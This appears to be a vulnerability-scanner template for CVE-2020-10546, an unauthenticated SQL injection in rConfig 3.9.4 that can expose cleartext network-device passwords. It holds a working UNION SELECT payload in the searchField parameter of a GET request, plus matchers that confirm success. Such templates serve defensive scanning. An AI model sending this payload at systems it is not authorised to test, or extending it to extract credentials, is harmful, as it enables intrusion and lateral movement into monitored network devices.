id: CVE-2020-10546 info: name: rConfig 3.9.4 SQL Injection author: madrobot severity: critical description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10546.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2020-10546 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-10546 cwe-id: CWE-89,CWE-522 tags: cve,cve2020,rconfig,sqli requests: - method: GET path: - "{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "[project-discovery]" part: body # Enhanced by mp on 2022/04/07